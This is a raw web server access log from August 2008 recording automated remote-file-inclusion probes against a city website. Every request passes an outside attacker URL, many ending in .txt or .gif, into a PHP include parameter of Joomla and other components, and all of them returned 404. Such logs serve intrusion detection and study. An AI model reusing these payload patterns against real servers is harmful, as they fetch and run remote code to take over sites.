85.119.243.57 - - [31/Aug/2008:18:09:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:10:06 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:10:07 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:10:50 -0700] "GET /logs/inc/index.php/error?dir[inc]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:10:51 -0700] "GET /inc/index.php/error?dir[inc]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:11:39 -0700] "GET /logs/access.log/errors.php?error=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:11:39 -0700] "GET /errors.php?error=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:11:39 -0700] "GET /logs/errors.php?error=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:11:56 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:11:57 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:15 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:21 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:21 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:12:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
84.21.71.133 - - [31/Aug/2008:18:13:48 -0700] "GET /logs/access_080101.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
124.217.231.243 - - [31/Aug/2008:18:17:48 -0700] "GET /logs/access_080201.log//modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
124.217.231.243 - - [31/Aug/2008:18:17:48 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
124.217.231.243 - - [31/Aug/2008:18:17:48 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://cartoes.emotioncard.nu/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:18:24:16 -0700] "GET /logs/access_080201.log/errors.php?error=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
147.102.106.10 - - [31/Aug/2008:18:27:30 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:28:05 -0700] "GET //index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:30:03 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:30:03 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:30:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:18:30:24 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:31:28 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:18:34:52 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:18:34:52 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:18:34:53 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:18:35:06 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:18:35:10 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:18:35:14 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:35:21 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:35:21 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:35:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.222.40.111 - - [31/Aug/2008:18:37:29 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
77.222.40.111 - - [31/Aug/2008:18:37:29 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
200.11.67.242 - - [31/Aug/2008:18:38:49 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.135.39.118 - - [31/Aug/2008:18:39:02 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:43:10 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:43:10 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
87.230.10.231 - - [31/Aug/2008:18:43:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
209.113.237.92 - - [31/Aug/2008:18:43:56 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://manu.freeunlimitedweb.com/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:28 -0700] "GET /logs/access_071231.log/comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:28 -0700] "GET /comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:28 -0700] "GET /logs/comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:29 -0700] "GET /logs/access_071231.log/comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:29 -0700] "GET /logs/comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
204.15.10.22 - - [31/Aug/2008:18:45:34 -0700] "GET /logs/access_080501.log/comments-display-tpl.php?config[comments_form_tpl]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:47:29 -0700] "GET /canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:47:29 -0700] "GET /logs/canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:47:33 -0700] "GET /canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:47:34 -0700] "GET /logs/canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:48:27 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:48:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [31/Aug/2008:18:48:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:49:37 -0700] "GET /canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:49:38 -0700] "GET /logs/canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:04 -0700] "GET /canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:05 -0700] "GET /logs/canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:08 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:32 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:50:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
77.221.130.5 - - [31/Aug/2008:18:50:41 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.5 - - [31/Aug/2008:18:50:41 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
77.221.130.5 - - [31/Aug/2008:18:50:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:18:51:02 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:18:51:03 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:18:51:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
77.221.130.5 - - [31/Aug/2008:18:52:02 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:52:22 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:52:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:18:52:34 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:52:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:52:50 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:53:28 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:53:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.57.163.125 - - [31/Aug/2008:18:54:37 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.57.163.125 - - [31/Aug/2008:18:54:38 -0700] "GET ///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.57.163.125 - - [31/Aug/2008:18:54:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://eduloco.kit.net/specialx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:55:51 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.199.190.37 - - [31/Aug/2008:18:55:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:18:56:00 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:18:56:00 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:18:56:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.47.247.136 - - [31/Aug/2008:18:56:00 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:07 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:07 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:07 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:07 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:09 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:09 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:11 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.171.245.29 - - [31/Aug/2008:18:56:11 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:56:25 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:56:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:56:51 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:57:13 -0700] "GET /canal.php?meio=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
190.83.18.253 - - [31/Aug/2008:18:57:39 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
190.83.18.253 - - [31/Aug/2008:18:57:39 -0700] "GET //Neos_Chronos/header.php?base_folder=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
190.83.18.253 - - [31/Aug/2008:18:57:49 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:58:10 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:58:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:58:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:58:31 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:59:13 -0700] "GET //skin/zero_vote/error.php?dir=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
201.6.251.5 - - [31/Aug/2008:18:59:24 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:59:45 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:18:59:46 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [31/Aug/2008:19:00:48 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
